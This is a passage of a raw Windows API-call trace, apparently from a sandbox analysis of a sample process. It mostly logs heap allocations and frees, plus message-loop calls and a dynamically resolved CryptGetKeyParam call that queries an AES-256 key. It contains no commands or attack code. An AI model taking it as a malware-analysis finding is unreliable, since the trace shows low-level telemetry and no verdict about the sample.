RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2a90 [0132.695] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caf40 [0132.695] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2ac0 [0132.695] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cae68 [0132.695] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2a60 [0132.695] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cae68 | out: hHeap=0x1780000) returned 1 [0132.695] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2a60 | out: hHeap=0x1780000) returned 1 [0132.695] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caf40 | out: hHeap=0x1780000) returned 1 [0132.695] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2ac0 | out: hHeap=0x1780000) returned 1 [0132.695] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caee0 | out: hHeap=0x1780000) returned 1 [0132.695] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2a90 | out: hHeap=0x1780000) returned 1 [0132.695] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2940 [0132.695] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2a90 [0132.695] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cb000 | out: hHeap=0x1780000) returned 1 [0132.695] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2930 | out: hHeap=0x1780000) returned 1 [0132.695] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cada8 | out: hHeap=0x1780000) returned 1 [0132.696] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cae20 | out: hHeap=0x1780000) returned 1 [0132.696] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43d0148 | out: hHeap=0x1780000) returned 1 [0132.696] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2a80 | out: hHeap=0x1780000) returned 1 [0132.696] PeekMessageW (in: lpMsg=0x144e63c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144e63c) returned 0 [0132.696] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfd88 [0132.696] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cafe8 [0132.696] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2a50 [0132.696] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cb078 [0132.696] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cae80 [0132.696] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2a80 [0132.696] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cae80 | out: hHeap=0x1780000) returned 1 [0132.696] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cffe0 [0132.696] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caf40 [0132.696] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e29f0 [0132.696] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2a60 [0132.696] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x30) returned 0x4392650 [0132.696] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0132.696] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x4392650 | out: hHeap=0x1780000) returned 1 [0132.696] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2a60 | out: hHeap=0x1780000) returned 1 [0132.696] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xc) returned 0x43cada8 [0132.696] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x40) returned 0x43a8f48 [0132.696] PeekMessageW (in: lpMsg=0x144dfec, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144dfec) returned 0 [0132.696] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2af0 [0132.696] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2990 [0132.696] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2990 | out: hHeap=0x1780000) returned 1 [0132.696] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2af0 | out: hHeap=0x1780000) returned 1 [0132.696] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43a8f48 | out: hHeap=0x1780000) returned 1 [0132.696] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cada8 | out: hHeap=0x1780000) returned 1 [0132.696] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e29f0 | out: hHeap=0x1780000) returned 1 [0132.696] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caf58 [0132.696] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2950 [0132.697] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caf70 [0132.697] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2950 | out: hHeap=0x1780000) returned 1 [0132.697] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cad90 [0132.697] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2a30 [0132.697] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cae68 [0132.697] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2a30 | out: hHeap=0x1780000) returned 1 [0132.697] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caf88 [0132.697] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e29c0 [0132.697] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caf10 [0132.697] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e29c0 | out: hHeap=0x1780000) returned 1 [0132.697] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caef8 [0132.697] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2a00 [0132.697] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2a00 | out: hHeap=0x1780000) returned 1 [0132.697] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cadf0 [0132.697] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2aa0 [0132.697] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cafa0 [0132.697] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2aa0 | out: hHeap=0x1780000) returned 1 [0132.697] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cafb8 [0132.697] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e29d0 [0132.697] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e29d0 | out: hHeap=0x1780000) returned 1 [0132.697] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cada8 [0132.697] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2960 [0132.697] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cae08 [0132.697] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2960 | out: hHeap=0x1780000) returned 1 [0132.697] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x40) returned 0x43a9218 [0132.698] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cffe0 | out: hHeap=0x1780000) returned 1 [0132.698] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cafd0 [0132.698] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2980 [0132.698] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x14) returned 0x1796de8 [0132.698] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x24) returned 0x17e2b18 [0132.698] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cadc0 [0132.698] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e29b0 [0132.698] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2980 | out: hHeap=0x1780000) returned 1 [0132.698] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cb018 [0132.698] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2ac0 [0132.698] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cb048 [0132.698] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2ac0 | out: hHeap=0x1780000) returned 1 [0132.698] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cb030 [0132.698] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2af0 [0132.698] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfdd8 [0132.698] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cae20 [0132.698] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2a30 [0132.698] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x14) returned 0x1796ec8 [0132.698] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x24) returned 0x17e2848 [0132.698] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cb000 [0132.698] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2a30 | out: hHeap=0x1780000) returned 1 [0132.699] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cb000 | out: hHeap=0x1780000) returned 1 [0132.699] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2960 | out: hHeap=0x1780000) returned 1 [0132.699] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x17e2848 | out: hHeap=0x1780000) returned 1 [0132.699] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1796ec8 | out: hHeap=0x1780000) returned 1 [0132.699] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cae20 | out: hHeap=0x1780000) returned 1 [0132.699] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfdd8 | out: hHeap=0x1780000) returned 1 [0132.699] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2af0 | out: hHeap=0x1780000) returned 1 [0132.699] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2950 | out: hHeap=0x1780000) returned 1 [0132.699] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2ac0 | out: hHeap=0x1780000) returned 1 [0132.699] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0132.699] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cae80 | out: hHeap=0x1780000) returned 1 [0132.699] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e29d0 | out: hHeap=0x1780000) returned 1 [0132.699] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cae98 | out: hHeap=0x1780000) returned 1 [0132.699] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2a60 | out: hHeap=0x1780000) returned 1 [0132.699] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cae80 | out: hHeap=0x1780000) returned 1 [0132.699] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2a40 | out: hHeap=0x1780000) returned 1 [0132.699] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cae98 | out: hHeap=0x1780000) returned 1 [0132.699] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2ae0 | out: hHeap=0x1780000) returned 1 [0132.699] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cae80 | out: hHeap=0x1780000) returned 1 [0132.699] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2b10 | out: hHeap=0x1780000) returned 1 [0132.699] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cae98 | out: hHeap=0x1780000) returned 1 [0132.699] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2a60 | out: hHeap=0x1780000) returned 1 [0132.699] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cae80 | out: hHeap=0x1780000) returned 1 [0132.699] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2aa0 | out: hHeap=0x1780000) returned 1 [0132.699] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cae98 | out: hHeap=0x1780000) returned 1 [0132.699] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2a30 | out: hHeap=0x1780000) returned 1 [0132.699] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caeb0 | out: hHeap=0x1780000) returned 1 [0132.699] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2960 | out: hHeap=0x1780000) returned 1 [0132.700] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cae80 | out: hHeap=0x1780000) returned 1 [0132.700] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2a60 | out: hHeap=0x1780000) returned 1 [0132.700] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cae80 | out: hHeap=0x1780000) returned 1 [0132.700] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2a30 | out: hHeap=0x1780000) returned 1 [0132.700] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cae98 | out: hHeap=0x1780000) returned 1 [0132.700] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2960 | out: hHeap=0x1780000) returned 1 [0132.700] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptGetKeyParam", cchWideChar=17, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 17 [0132.700] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptGetKeyParam", cchWideChar=17, lpMultiByteStr=0x1796fe8, cbMultiByte=17, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptGetKeyParam", lpUsedDefaultChar=0x0) returned 17 [0132.700] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cae80 | out: hHeap=0x1780000) returned 1 [0132.700] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1796fe8 | out: hHeap=0x1780000) returned 1 [0132.700] GetProcAddress (hModule=0x756e0000, lpProcName="CryptGetKeyParam") returned 0x75712db0 [0132.700] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43d0170 | out: hHeap=0x1780000) returned 1 [0132.700] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e29c0 | out: hHeap=0x1780000) returned 1 [0132.700] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2990 | out: hHeap=0x1780000) returned 1 [0132.700] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e29e0 | out: hHeap=0x1780000) returned 1 [0132.700] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2a00 | out: hHeap=0x1780000) returned 1 [0132.700] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2960 | out: hHeap=0x1780000) returned 1 [0132.700] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2a10 | out: hHeap=0x1780000) returned 1 [0132.700] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43d0148 | out: hHeap=0x1780000) returned 1 [0132.700] CryptGetKeyParam (in: hKey=0x41ac140, dwParam=0x7, pbData=0x43e2a90, pdwDataLen=0x144e008, dwFlags=0x0 | out: pbData=0x43e2a90*=0x6610, pdwDataLen=0x144e008*=0x4) returned 1 [0132.700] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caeb0 | out: hHeap=0x1780000) returned 1 [0132.700] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2a30 | out: hHeap=0x1780000) returned 1 [0132.700] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cae98 | out: hHeap=0x1780000) returned 1 [0133.517] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caee0 | out: hHeap=0x1780000) returned 1 [0133.517] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2a40 | out: hHeap=0x1780000) returned 1 [0133.517] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caeb0 | out: hHeap=0x1780000) returned 1 [0133.517] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cb0f0 | out: hHeap=0x1780000) returned 1 [0133.518] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2980 | out: hHeap=0x1780000) returned 1 [0133.518] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caee0 | out: hHeap=0x1780000) returned 1 [0133.518] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cb138 | out: hHeap=0x1780000) returned 1 [0133.518] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2a30 | out: hHeap=0x1780000) returned 1 [0133.518] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cb360 | out: hHeap=0x1780000) returned 1 [0133.518] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cb108 | out: hHeap=0x1780000) returned 1 [0133.518] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2a60 | out: hHeap=0x1780000) returned 1 [0133.518] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cb1b0 | out: hHeap=0x1780000) returned 1 [0133.518] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cb108 | out: hHeap=0x1780000) returned 1 [0133.518] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2ae0 | out: hHeap=0x1780000) returned 1 [0133.518] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cb150 | out: hHeap=0x1780000) returned 1 [0133.518] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2b00 | out: hHeap=0x1780000) returned 1 [0133.518] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e29f0 | out: hHeap=0x1780000) returned 1 [0133.518] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2ac0 | out: hHeap=0x1780000) returned 1 [0133.518] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2950 | out: hHeap=0x1780000) returned 1 [0133.518] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e29d0 | out: hHeap=0x1780000) returned 1 [0133.518] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cffe0 | out: hHeap=0x1780000) returned 1 [0133.518] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cae38 | out: hHeap=0x1780000) returned 1 [0133.518] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2970 | out: hHeap=0x1780000) returned 1 [0133.518] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caf40 | out: hHeap=0x1780000) returned 1 [0133.518] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caf70 | out: hHeap=0x1780000) returned 1 [0133.518] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caf58 | out: hHeap=0x1780000) returned 1 [0133.518] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cae68 | out: hHeap=0x1780000) returned 1 [0133.518] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cad90 | out: hHeap=0x1780000) returned 1 [0133.518] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caf10 | out: hHeap=0x1780000) returned 1 [0133.518] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caf88 | out: hHeap=0x1780000) returned 1 [0133.518] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caef8 | out: hHeap=0x1780000) returned 1 [0133.518] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cafa0 | out: hHeap=0x1780000) returned 1 [0133.518] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cadf0 | out: hHeap=0x1780000) returned 1 [0133.518] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cafb8 | out: hHeap=0x1780000) returned 1 [0133.519] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cae08 | out: hHeap=0x1780000) returned 1 [0133.519] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cada8 | out: hHeap=0x1780000) returned 1 [0133.519] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cadc0 | out: hHeap=0x1780000) returned 1 [0133.519] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e29b0 | out: hHeap=0x1780000) returned 1 [0133.519] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x17e2b18 | out: hHeap=0x1780000) returned 1 [0133.519] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1796de8 | out: hHeap=0x1780000) returned 1 [0133.519] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cafd0 | out: hHeap=0x1780000) returned 1 [0133.519] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cb048 | out: hHeap=0x1780000) returned 1 [0133.519] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cb018 | out: hHeap=0x1780000) returned 1 [0133.519] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cb030 | out: hHeap=0x1780000) returned 1 [0133.519] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cb000 | out: hHeap=0x1780000) returned 1 [0133.519] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cadd8 | out: hHeap=0x1780000) returned 1 [0133.519] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cae20 | out: hHeap=0x1780000) returned 1 [0133.519] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43a9218 | out: hHeap=0x1780000) returned 1 [0133.519] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2a80 | out: hHeap=0x1780000) returned 1 [0133.519] PeekMessageW (in: lpMsg=0x144e63c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144e63c) returned 1 [0133.519] TranslateMessage (lpMsg=0x144e63c) returned 0 [0133.519] DispatchMessageW (lpMsg=0x144e63c) returned 0x0 [0133.519] KillTimer (hWnd=0x502d2, uIDEvent=0x1) returned 1 [0133.519] SetTimer (hWnd=0x502d2, nIDEvent=0x1, uElapse=0x2ee, lpTimerFunc=0x0) returned 0x1 [0133.519] PeekMessageW (in: lpMsg=0x144e63c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144e63c) returned 0 [0133.519] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caf10 | out: hHeap=0x1780000) returned 1 [0133.519] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e9e18 | out: hHeap=0x1780000) returned 1 [0133.519] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2950 | out: hHeap=0x1780000) returned 1 [0133.520] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e29f0 | out: hHeap=0x1780000) returned 1 [0133.520] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caf88 | out: hHeap=0x1780000) returned 1 [0133.520] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caf88 | out: hHeap=0x1780000) returned 1 [0133.520] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e8f00 | out: hHeap=0x1780000) returned 1 [0133.520] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e29d0 | out: hHeap=0x1780000) returned 1 [0133.520] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e29a0 | out: hHeap=0x1780000) returned 1 [0133.520] PeekMessageW (in: lpMsg=0x144e63c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144e63c) returned 0 [0133.520] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e29d0 | out: hHeap=0x1780000) returned 1 [0133.520] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2a60 | out: hHeap=0x1780000) returned 1 [0133.520] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2a30 | out: hHeap=0x1780000) returned 1 [0133.520] PeekMessageW (in: lpMsg=0x144e63c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144e63c) returned 0 [0133.520] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2930 | out: hHeap=0x1780000) returned 1 [0133.520] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2b20 | out: hHeap=0x1780000) returned 1 [0133.520] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1796f28 | out: hHeap=0x1780000) returned 1 [0133.520] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2a60 | out: hHeap=0x1780000) returned 1 [0133.520] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e29c0 | out: hHeap=0x1780000) returned 1 [0133.520] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2a60 | out: hHeap=0x1780000) returned 1 [0133.520] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2a80 | out: hHeap=0x1780000) returned 1 [0133.520] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cb018 | out: hHeap=0x1780000) returned 1 [0133.520] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2960 | out: hHeap=0x1780000) returned 1 [0133.520] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x17e2b18 | out: hHeap=0x1780000) returned 1 [0133.520] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1797008 | out: hHeap=0x1780000) returned 1 [0133.520] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cadf0 | out: hHeap=0x1780000) returned 1 [0133.520] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cae20 | out: hHeap=0x1780000) returned 1 [0133.520] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43d00f8 | out: hHeap=0x1780000) returned 1 [0133.520] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2980 | out: hHeap=0x1780000) returned 1 [0133.520] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x41ac180 | out: hHeap=0x1780000) returned 1 [0133.520] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43a9188 | out: hHeap=0x1780000) returned 1 [0133.520] HeapFree 